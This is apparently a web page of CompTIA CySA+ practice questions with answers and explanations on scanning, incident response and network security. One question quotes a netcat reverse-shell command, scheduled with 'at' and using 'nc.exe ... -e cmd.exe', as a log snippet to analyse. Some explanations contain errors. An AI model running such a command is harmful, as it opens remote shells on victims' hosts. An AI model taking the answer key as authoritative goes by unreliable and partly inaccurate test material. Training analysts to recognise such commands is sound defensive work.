Mock Test : CompTIA CySA+ (CS0-001)

What provides a standard nomenclature for describing security-related software flaws?

Options are :

  • CVE (Correct)
  • SOX
  • Patch
  • Vulnerability

Answer : CVE

Explanation Common Vulnerabilities and Exposures (CVE) is an element of the Security Content Automation Protocol (SCAP) that provides a standard nomenclature for describing security flaws.

Which of the protocols listed is not likely to be a trigger for a vulnerability scan alert when it’s used to support a virtual private network (VPN)?

Options are :

  • IPSec (Correct)
  • SSLv2
  • PPTP
  • SSLv3

Answer : IPSec

Explanation IPSec is a secure protocol that works with VPNs. The use of SSL and PPTP is discouraged for VPN security.

JK0-019 CompTIA E2C Network + Certification Exam Set 9

A cyber security analyst works at a college that wants to increase the security of its network by implementing vulnerability scans of both centrally-managed workstations, student laptops, and faculty laptops. This solution must be able to scale up or down as new students and faculty use the network. Additionally, the college wants to minimize the amount of false positives and ensure a high accuracy of the results. The solution must also be centrally-managed through an enterprise console. What scanning topology would be BEST to meet these requirements?

Options are :

  • Passive scanning engine located at the core of the network infrastructure
  • Combination of cloud-based and server-based scanning engines
  • Combination of server-based and agent-based scanning engines
  • Active scanning engine installed on the enterprise console (Correct)

Answer : Active scanning engine installed on the enterprise console

Explanation Since the college wants to ensure there is a centrally-managed enterprise console, using an active scanning engineer installed on the enterprise console would best meet these requirements. Then, the college’s cyber security analysts could perform scans on any devices that are connected to the network using the active scanning engine at the desired intervals.

Which one of the listed approaches give the most current and accurate information about the vulnerabilities present in a system because of an operating system that has misconfigured settings?

Options are :

  • On-demand vulnerability scanning
  • Continuous vulnerability scanning
  • Scheduled vulnerability scanning
  • Agent-based monitoring (Correct)

Answer : Agent-based monitoring

Explanation Of these listed approaches, vulnerability scans can only give you a snapshot of a system's status at a certain time. Agent-based monitoring provides many more details of the configuration and provides an internal perspective.

Marsha noticed that a management interface for a virtualization platform was exposed to a scanner when performing a vulnerability scan of her data center. In normal circumstances, what would the proper exposure for this interface be?

Options are :

  • Internet
  • Internal networks
  • No exposure
  • Management network (Correct)

Answer : Management network

Explanation The best practice for this particular situation would be to expose the management interface to an isolated/dedicated network that only authorized engineers are able to see. This would also help reduce the likelihood of an attack against the host/platform.

SY0-401 CompTIA Security+ Certification Practice Exam Set 8

What is an insecure protocol that should not be used?

Options are :

  • Telnet (Correct)
  • SSH
  • SFTP
  • HTTPS

Answer : Telnet

Explanation Telnet uses cleartext transmission of authentication credentials and should be replaced with the secure shell (SSH) protocol.

Greg is worried over theft of sensitive information that’s stored in a database. Which of the following vulnerabilities have a direct threat to this information?

Options are :

  • SQL injection (Correct)
  • Cross-site scripting
  • Buffer overflow
  • Denial of service

Answer : SQL injection

Explanation While a buffer overflow attack could have a negative impact on information stored in a database, an SQL injection could pose a more direct and more impactful threat. The SQL injection could allow the attacker to execute remote commands on the database server. Cross-site scripting attacks are typically user-based threats. A DoS, denial of service, attack targets availability instead of the information disclosure.

Neil ran a port scan on a network device. Which of the following ports listed (open) represents the most significant possible security vulnerability?

Options are :

  • 22
  • 23 (Correct)
  • 161
  • 443

Answer : 23

Explanation The best answer is port 23. 23 is used by Telnet and is not secure/encrypted. Neil should ensure that telnet is disabled and blocked as well. SSH runs on port 22, Port 161 is SNMP, and port 443 is HTTPS for secure web connections.

JK0-017 CompTIA E2C Project+ Certification Practice Exam Set 1

Which of the following is the most difficult to confirm with an external vulnerability scan?

Options are :

  • Cross-site scripting (XSS)
  • Cross-site request forgery (XSRF/CSRF)
  • Blind SQL injection (Correct)
  • Unpatched web server

Answer : Blind SQL injection

Explanation XSS and CSRF/XSRF are typically easier to detect because the scanner can pick up information that proves a successful attack. Unpatched servers can usually be identified by the banner information; and scanners typically cannot confirm blind SQL injections with execution of code.

Edward's IDS reports that ports 1 to 1024 received SYN packets from a remote host. What has likely happened to cause this traffic?

Options are :

  • Remote host cannot find the right service port
  • SYN flood
  • Port scan (Correct)
  • UDP probe

Answer : Port scan

Explanation A SYN scan may connect to each possible open port on a remote system, triggering an IDS. While scanners support more stealthy scans, default scans may connect to each port in turn. Remote hosts will typically connect to only a single port associated with a service. A SYN flood normally sends many SYNs to a single system but doesn’t send them to unused ports, and a UDP probe will not send SYN packets.

A company has an open investigation and hires you as a cyber security analyst to assist with the investigation. When you arrive, you begin by reviewing some security logs. During the log review, you notice the following snippet of code: 

sc config schedule start auto net start schedule at 10:42 “?c:\temp\nc.exe 172.16.34.12 443 -e cmd.exe “? 

What BEST describes the situation and recommendations you should make to remedy this situation?

Options are :

  • The host (172.16.34.12) is using the Windows Task Scheduler at 10:42 to run nc.exe from the temp directory; You recommend removing the host from the network. (Correct)
  • The host (172.16.34.12) is running nc.exe from the temp directory at 10:42 using the auto cron job remotely; No recommendation is required since this is not currently a threat.
  • The host (172.16.34.12) is beaconing every day at 10:42 by running nc.exe from the temp directory; You recommend removing the host from the network.
  • The host (172.16.34.12) is a rogue device on the network; You recommend removing the host from the network.

Answer : The host (172.16.34.12) is using the Windows Task Scheduler at 10:42 to run nc.exe from the temp directory; You recommend removing the host from the network.

Explanation The code snippet is setting up a Windows Task Scheduler task (at). This command (nc.exe) will run at the specified time (10:42) each day. This is the netcat program, and is being run from the c:\temp directory to setup a reverse shell (-e cmd.exe) to the host (172.16.34.12 on port 443).

JK0-016 CompTIA Network+ 2009 Edition Practice Exam Set 10

Which of the following are related to patents, copyrights, trademarks, and trade secrets?

Options are :

  • PII
  • PHI
  • Corporate confidential
  • Intellectual property (Correct)

Answer : Intellectual property

Explanation Patents, copyrights, and trademarks are all considered to be intellectual property. Trade secrets are considered proprietary and are not protected by governments.

Bob needs to verify that the workstations he is responsible for have received a particular critical Windows patch. Which method should be used to avoid validating patch status for all Windows 10 systems?

Options are :

  • Check the Update History manually
  • Run the Microsoft Baseline Security Analyzer (Correct)
  • Create and run a PowerShell script to search for the specific patch in question
  • Use SCCM to validate patch status for each machine on the domain

Answer : Run the Microsoft Baseline Security Analyzer

Explanation The best answer is MBSA (Microsoft baseline security analyzer). This program is now outdated and shouldn’t be used to support Windows 10. (MBSA v2.3 still works with Windows 10, but it is being phased out.)

Jamie has been tasked with finding a rogue network device on her wired network. What option is NOT likely to help identify the rogue device?

Options are :

  • MAC validation
  • Port scanning
  • Site surveys
  • War-walking (Correct)

Answer : War-walking

Explanation While checking valid MAC addresses against a known list, scanning for new systems or device and physically surveying for unexpected systems can be helpful. War-walking (surveying for wireless networks and devices) won’t help find a wired rogue device.

SY0-401 CompTIA Security+ Certification Practice Exam Set 7

Certain permissions are set on a directory structure on a Windows system that Tony is currently investigating. Which Sysinternals tool will provide him with this information?

Options are :

  • DiskView
  • AccessEnum (Correct)
  • du
  • AccessChk

Answer : AccessEnum

Explanation The Sysinternals suite actually provides people with two tools used for checking access, which are AccessEnum and AccessChk. AccessEnum is a GUI program that gives you a full view of the filesystem as well as registry settings and can display with permissions. AccessChk is a command line program that can check the rights a user or group has access to. Therefore, the best choice here is AccessEnum.

Jonathan’s team completed the first phase of their incident response process. They’re currently assessing the time to recover from the incident. Using the NIST recoverability effort categories, the team has decided that they can predict the time to recover but this requires additional resources. How should he categorize this using the NIST model?

Options are :

  • Regular
  • Supplemented (Correct)
  • Extended
  • Not recoverable

Answer : Supplemented

Explanation NIST keys are used to remember each level has additional unknowns as well as resources that increase the severity level from regular to supplemented then extended. Nonrecoverable situations exist when whatever happened cannot be remediated and then an investigation is launched. In a nongovernment agency, this phase COULD include notifying law enforcement. The best option for this is supplemented.

What is NOT a means of improving data validation and trust?

Options are :

  • Encrypting data in transit
  • Using MD5 checksums for files
  • Decrypting data at rest (Correct)
  • Implementing Tripwire

Answer : Decrypting data at rest

Explanation While encrypting data, hashing files using MD5 to check against known valid checksums and implementing a file integrity monitor are all methods of improving data validation and trust. Decrypting data at rest does not improve your ability to trust it!

CompTIA N10-004 Network+ Certification Practice Test Set 2

Rhett is currently tracing activity from an attacker who compromised a host on the network. The individual appears to have used credentials belonging to a janitor. After breaching the system, the attacker entered some unrecognized commands with very long strings of text and then began using the sudo command to carry out actions. What type of attack has just taken place?

Options are :

  • Privilege escalation (Correct)
  • Phishing
  • Social engineering
  • Session hijacking

Answer : Privilege escalation

Explanation The best answer is privilege escalation. The use of long query strings points to a buffer overflow attack and the sudo command confirms the elevated privileges after the attack. The other options are possible ways for an attacker to achieve information but there is no evidence that shows these happened.

Ellen is asked for a code that is sent to her via text (SMS) message during her login process. What concerns should she raise to the manager of her organization’s AAA services?

Options are :

  • SMS should be encrypted to be secure.
  • SMS messages may be accessible to attackers via VoIP or other systems. (Correct)
  • SMS should be paired with a third factor.
  • SMS is secure, and she should not raise a concern.

Answer : SMS messages may be accessible to attackers via VoIP or other systems.

Explanation NIST’s SP 800-63-3 recommends that SMS messages be deprecated as a means of delivering a second factor for multifactor authentication because they may be accessible to attackers. SMS is unable to be encrypted (at least without adding additional applications to phones), and a third factor is typically not a user-friendly recommendation.

Stewart is responsible for conducting periodic reviews of the information security policy for his organization, of which he is the CISO. The policy was drafted three years ago and has had a few revisions after some audits and assessments have taken place. Which of the following is the most reasonable frequency to conduct formal reviews?

Options are :

  • Monthly
  • Quarterly
  • Annually (Correct)
  • Every five years

Answer : Annually

Explanation The best option is annual reviews. Annual reviews are an industry standard and are typically sufficient unless circumstances happen which force an update/revision sooner. Waiting five years doesn’t make any sense at all and monthly/quarterly may be too soon for substantial changes.

CompTIA JK0-022 E2C Security+ Compliance & Operational Exam Set 2

A software assurance laboratory is performing a dynamic assessment on an application by automatically generating random data sets and inputting them in an attempt to cause an error or failure condition. In what phase of the SDLC does fuzzing occur?

Options are :

  • Planning phase
  • Requirements phase
  • Prototyping phase (Correct)
  • Static code analysis

Answer : Prototyping phase

Explanation During the prototyping phase, security testers can implement fuzzing techniques to find vulnerabilities by conducting a dynamic assessment on a given application.

Of the following connection status messages, which one indicates an active connection between two systems?

Options are :

  • ESTABLISHED (Correct)
  • LISTENING
  • LAST_ACK
  • CLOSE_WAIT

Answer : ESTABLISHED

Explanation The best option is the ESTABLISHED message. This indicates that a connection is active between two systems. LISTENING is waiting for a connection, LAST_ACK and CLOSE-WAIT are messages that appear in closing a connection.

You have been hired as a consultant to help a company, Blueboard Enterprises, develop a new disaster recovery plan. Blueboard has recently grown in the number of employees, and so has its information systems infrastructure to support those new employees. Unfortunately, Blueboard doesn’t currently have any documentation, policies, or procedures for its network. What is the first step you should recommend to Blueboard’s management in order to help in the development of the disaster recovery plan?

Options are :

  • Conduct a risk assessment
  • Develop a data retention policy
  • Execute vulnerability scanning
  • Identify assets (Correct)

Answer : Identify assets

Explanation The first step to developing an effective disaster recovery plan is to understand exactly what assets your organization has. This requires the identification of assets. Once identified, you can then determine what assets and services are essential to business operations and how best to recover in the event of a disaster.

CompTIA JK0-022 E2C Security+ Network Security Practice Exam Set 2

What type of controls are Firewalls, intrusion detection systems, and RADIUS examples of?

Options are :

  • Administrative controls
  • Technical controls (Correct)
  • Physical controls
  • Compensating controls

Answer : Technical controls

Explanation Firewalls, intrusion detection systems, and RADIUS are all examples of technical controls. Administrative controls involve processes and procedures, and physical controls include locks, fences, and other controls over physical access. Compensating controls are controls that are put in place to cover for gaps in other controls.

Which protocol is paired with OAuth2 to provide authentication services in a federated identity management solution on the Web?

Options are :

  • Kerberos
  • ADFS
  • SAML
  • OpenID (Correct)

Answer : OpenID

Explanation The best option is OpenID. Pairing OAuth with OpenID is a common approach to provide a complete solution.

Joe and Mary work together to review Joe’s code with Mary explaining the code he wrote as he reviews it. What code review technique are Joe and Mary using?

Options are :

  • Pair programming
  • Dual control
  • Over-the-shoulder (Correct)
  • Tool assisted review

Answer : Over-the-shoulder

Explanation Over-the-shoulder code reviews rely on a programmer explaining their code to a peer, providing a chance for review and better understanding for both coders. Pair programming alternates between programmers, with one strategizing and reviewing it while the other writes code. Dual control is a personnel security process, and tool-assisted reviews are conducted using a software tool.

CompTIA N10-004 Network+ Certification Practice Test Set 3

Which of the following is not normally part of an endpoint security suite?

Options are :

  • IPS
  • Firewall
  • Antimalware
  • VPN (Correct)

Answer : VPN

Explanation VPN is the best answer. Endpoint security includes host firewalls, IPS, and antimalware software.

Lisa is working with a development team on including security best practices in the SDLC. She frequently consults the Center for Internet Security’s system design recommendations. Which of the following control categories would contain information helpful for her?

Options are :

  • Inventory of authorized/unauthorized devices
  • Controlled use of administrative privileges
  • Application software security (Correct)
  • Malware defenses

Answer : Application software security

Explanation The best option is application software security. While all other documents contain information helpful, the application software security control is the only one most likely to contain relevant information relating to the SDLC.

Nate has been tasked with choosing a firewall to protect his organization’s internal infrastructure to help protect his organization from network-based attacks. Which of the following is not an option that would meet his requirements?

Options are :

  • Cisco NGFW
  • HP TippingPoint (Correct)
  • CheckPoint appliance
  • Palo Alto NGFW

Answer : HP TippingPoint

Explanation TippingPoint is an IPS which notifies of intrusions to a network. The other options are all firewall solutions.

SK0-004 CompTIA Server+ Certification Practice Exam Set 1

Of the following vulnerability scanning tools, which option is limited to collecting information from specific operating systems only?

Options are :

  • Nikto
  • OpenVAS
  • MBSA (Correct)
  • Qualys

Answer : MBSA

Explanation The MBSA system works only with Windows operating systems (hence the name, Microsoft Baseline System Analyzer). The other products run on multiple systems.

If there is an expected loss of ______ or more, then the federal government classifies the economic impact of a security incident as high.

Options are :

  • $1
  • $10,000
  • $100,000
  • $500,000 (Correct)

Answer : $500,000

Explanation The federal government uses the threshold of $500,000 to distinguish high-impact breaches. Medium-impact breaches are between $10,000 and $500,000. Low-impact breaches are between $1 and $10,000.

Alissa doesn’t want to run a program installed by a user that she believes is set with a RunOnce key in the registry but she needs to boot the system. What can she do to prevent the RunOnce from executing the programs listed in the registry key?

Options are :

  • Disable the registry at boot
  • Boot with Safe Mode (Correct)
  • Boot with the –RunOnce flag
  • RunOnce cannot be disabled; she will need to boot from external media to disable it first.

Answer : Boot with Safe Mode

Explanation When booting in Safe Mode, Run and RunOnce are ignored by the Windows system. The best answer choice is to boot with Safe Mode.

SY0-401 CompTIA Security+ Certification Practice Exam Set 4

Tanner needs to sanitize hard drives from several leased workstations that are being returned to the supplier at the end of the lease period. The drives contained information that his organization classifies as sensitive data that some companies would find valuable if they could obtain it. Which is the most appropriate choice to ensure that data exposure doesn’t occur during this process?

Options are :

  • Clear, validate, and document
  • Purge the drives
  • Purge, validate, and document (Correct)
  • The drives must be destroyed to ensure no data loss

Answer : Purge, validate, and document

Explanation One thing to note is that these were leased drives that are being returned at the end of a lease. The contract, surely, does not allow the drives to be destroyed so purging the drives, validating what’s been purged, and documenting the entire project is the best response. Clearing them leaves a possibility that some tools would allow data recovery.

You are a cyber security analyst who has been given the output from a system administrator's Linux terminal. Based on the output provided, which of the following statements is TRUE? 

BEGIN OUTPUT
———————---------

# nmap win2k12.local

Nmap scan report for win2k12 (192.168.2.15)
Host is up (0.132452s latency)
Not shown: 997 closed ports 
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http 

# nc win2k12.local 80

220 win2k12.local BeverageCorp SMTP Server (Postfix/2.4.1) 

# nc win2k12.local 22 SSH-2.0-OpenSSH_7.2 Debian-2  #

———————---------
END OUTPUT

Options are :

  • Your email server is running on a non-standard port (Correct)
  • Your email server has been compromised
  • Your organization has a vulnerable version of the SSH server software installed
  • Your web server has been compromised

Answer : Your email server is running on a non-standard port

Explanation As shown in the output of the nmap scans, only two standard ports are being utilized: 22 (SSH) and 80 (HTTP). But, when netcat is run against port 80, the banner that is provided shows the SMTP server is running on port 80. SMTP is normally run on port 25 by default, so running it on port 80 means your email server (SMTP) is running on a non-standard port.

You have been asked in by the Security Operations Center Manager to look over a recent network utilization report because he fears that something may be wrong. The report is as follows:


IP Address        Server Name    Server Uptime        Historical      Current
192.168.20.2    web01                7D 12H 32M 06S     42.6 GB     44.1 GB
192.168.20.3    webdev02         4D 07H 12M 45S     1.95 GB      2.13 GB
192.168.20.4    dbsvr01            12D 02H 46M 14S     3.15 GB     24.6 GB
192.168.20.5    marketing01      2D 17H 18M 41S     5.2 GB       4.9 GB 

Based on the report provided, what server do you think your cyber security analysts need to investigate further?

Options are :

  • web01
  • webdev02
  • dbsvr01 (Correct)
  • marketing01

Answer : dbsvr01

Explanation You should consider investigating the dbsvr01 due to the very large increase in network utilization. The server has a historical average utilization of only 3.15 GB per month, but this month there has been an increase to 24.6 GB of usage. This is indicative of a possible data breach and data exfiltration.

N10-006 CompTIA Network+ Certification Practice Test Set 4

You are a cyber security analyst and have been asked to review the following packet of information: 

23:12:23.154234 IP 172.18.10.3:25 > 192.168.10.45:3389 Flags [P.], Seq 1834:1245, ack1, win 511, options [nop,nop, TS val 263451334 erc 482862734, length 125

After looking over the information on the packet, you discovered there is an unauthorized service running on the host. What ACL should be implemented to prevent further access to the unauthorized service while maintaining full access to the approved services running on that host?

Options are :

  • DENY TCP ANY HOST 192.168.10.45 EQ 3389 (Correct)
  • DENY IP HOST 192.168.10.45 ANY EQ 25
  • DENY IP HOST 172.18.10.3 HOST 192.168.10.45 EQ 3389
  • DENY TCP ANY HOST 172.18.10.3 EQ 25

Answer : DENY TCP ANY HOST 192.168.10.45 EQ 3389

Explanation Since the question asks you to prevent access to the unauthorized service, we need to block port 3389 from accepting connections on 192.168.10.45 (the host). This option will deny ANY workstation from connecting to this machine (host) over port 3389 (the Remote Desktop Protocol service, which is unauthorized).

Your company has recently been the victim of a large scale data breach. The hackers were able to exfiltrate the personal information and social security numbers of your customers during their attack. The Chief Executive Officer has notified law enforcement about the breach and they will be assisting with the investigation into the cause and to help collect evidence to attempt to put the hackers into prison. What actions should you take in response to this event?

Options are :

  • You should provide training to all your employees about the proper incident communication channels to use during a security event
  • You should ask all employees to commit to an NDA about the data breach verbally
  • You should block all employee access to social media from the company’s network
  • You should ask a member of law enforcement to meet with your employees (Correct)

Answer : You should ask a member of law enforcement to meet with your employees

Explanation Since the data breach is the subject of an active law enforcement investigation, you should request that a representative of the law enforcement agency speak with your employees to give them clear guidance on what they can and cannot say to people outside of the investigation.

An incident responder is reverse engineering a piece of malware recovered from a retailer’s network for analysis. They found that the malicious code was extracting track data in memory. What type of threat did the incident responder MOST likely uncover?

Options are :

  • Rootkit
  • Key logger
  • Ransomware
  • POS malware (Correct)

Answer : POS malware

Explanation POS malware focuses on retail terminals like cash registers and other Point of Sale systems.

CompTIA Network+ 6 Certification Practice Exams - 2019 Set 5

A penetration tester would seek to gain complete control of a system during what phase of a penetration test?

Options are :

  • Planning
  • Attack (Correct)
  • Reporting
  • Discovery

Answer : Attack

Explanation During the attack phase, the attacker seeks to gain access to a system, escalate that access to obtain complete control, and then conduct browsing to identify mechanisms to gain access to additional systems.

Which of the following is NOT one of the main criteria that should be included in a penetration testing plan?

Options are :

  • Timing
  • Scope
  • Account credentials (Correct)
  • Authorization

Answer : Account credentials

Explanation The three main criteria that should be included in a penetration testing plan are timing, scope, and authorization.

A cybersecurity analyst has received an alert that well-known “call home? messages are continuously observed by network sensors at the network boundary. The good news is that the proxy firewall was properly configured to successfully drop the messages prior to them leaving the network. These “call home? messages have been determined to be a true positive. What is MOST likely the cause?

Options are :

  • Attackers are running reconnaissance on company resources
  • An infected system is running a command that is attempting to reach a botnet's command and control server (Correct)
  • A malicious insider is trying to exfiltrate information to a remote network
  • Malware is running on a company workstation or server

Answer : An infected system is running a command that is attempting to reach a botnet's command and control server

Explanation The “call home? message is indicative of beaconing. This usually occurs after a stage 1 malware has been implanted on a company’s workstation or server, but the more correct answer is that this infected system is running a command that is attempting to reach a botnet’s command and control server. This beaconing will continue until the infected host (workstation or server) is found and cleared of the malware, or until the botnet gives the infected host further instructions (such as to attack).

CV0-001 CompTIA Cloud+ Certification Practice Exam Set 8

Cybersecurity risks result from the combination of a threat and a(n) _____________.

Options are :

  • Malicious Actor
  • Risk
  • Vulnerability (Correct)
  • Exploit

Answer : Vulnerability

Explanation Cybersecurity risks result from the combination of a threat and a vulnerability. A vulnerability is a weakness in a device, system, application, or process that might allow an attack to take place. A threat in the world of cybersecurity is an outside force that may exploit a vulnerability

If your DNS server allows __________ and is not properly secured, attackers may be able to get a full listing of your internal DNS information.

Options are :

  • Zone transfers (Correct)
  • Split horizon
  • FQDN resolution
  • Remediate the threat

Answer : Zone transfers

Explanation DNS zone transfers provide a full listing of DNS information. Improperly secured DNS servers may allow attackers to gather this data by performing a zone transfer.

Amy is under the impression that attackers were able to extract a VSC (volume shadow copy) from a workstation on her organization’s domain, which belonged to a domain administrator. What information should not be reported as being potentially exposed?

Options are :

  • All files on user’s desktops
  • Password hashes
  • Domain details
  • Plan-text Windows account passwords (Correct)

Answer : Plan-text Windows account passwords

Explanation The best option is plain-text passwords on Windows accounts since this doesn’t happen, due to the fact Windows hashes all passwords it stores. She should report all user’s files, password hashes and domain details as possibly being exposed.

HT0-201 CEA- CompTIA DHTI+ Certification Practice Exam Set 5

Ryan was asked to implement network controls to ensure that users who authenticate are physically in the building of the network they’re authenticating to. What technology and tool should be used for this?

Options are :

  • Geo-IP and port security
  • GPS location and NAC (Correct)
  • GPS location and port-security
  • Geo-IP and NAC

Answer : GPS location and NAC

Explanation GPS location and Network Access Control is the best option. Network Access Control is used to identify an endpoint with network authentication and the GPS location will provide the longitude and latitude of the user.

TRUE or FALSE: Networks are made more secure through the use of network access control, firewalls, and segmentation.

Options are :

  • TRUE (Correct)
  • FALSE

Answer : TRUE

Explanation Networks are made more secure through the use of network access control, firewalls, and segmentation. Network access control (NAC) solutions help security professionals achieve two cybersecurity objectives: limiting network access to authorized individuals and ensuring that systems accessing the organization’s network meet basic security requirements. Network firewalls sit at the boundaries between networks and provide perimeter security. Network segmentation uses isolation to separate networks of differing security levels from each other.

Johnny wants to make sure he receives logs for his Cisco devices that indicate when they shut down due to failure. What level of log level message should Johnny configure his devices in order to receive these types of messages?

Options are :

  • 0 (Correct)
  • 2
  • 5
  • 7

Answer : 0

Explanation Cisco log levels range from 0 for emergencies to 7 for debugging.

JK0-017 CompTIA E2C Project+ Certification Practice Exam Set 11

Tara’s company is making significant investments in infrastructure-as-a-service (IaaS) hosting to replace its data centers. Members of the company have expressed concerns about data remanence when the team moves from one Virtual host to another in their cloud service environment. What should the team be instructed to do to avoid this concern?

Options are :

  • Zero-wipe drives before moving systems
  • Use full-disk encryption (Correct)
  • Use data masking
  • Span multiple virtual disks to fragment data

Answer : Use full-disk encryption

Explanation The best option out of the ones listed would be to use full disk encryption. This method will ensure that all data is encrypted and cannot be exposed to users whether physical or virtual. Using a zero wipe is typically impossible because VM systems may move without user intervention; data masking will not prevent temporary data from being exposed and spanning multiple disks will leave the data accessible, even though it’ll be fragmented.

Comment / Suggestion Section
Point our Mistakes and Post Your Suggestions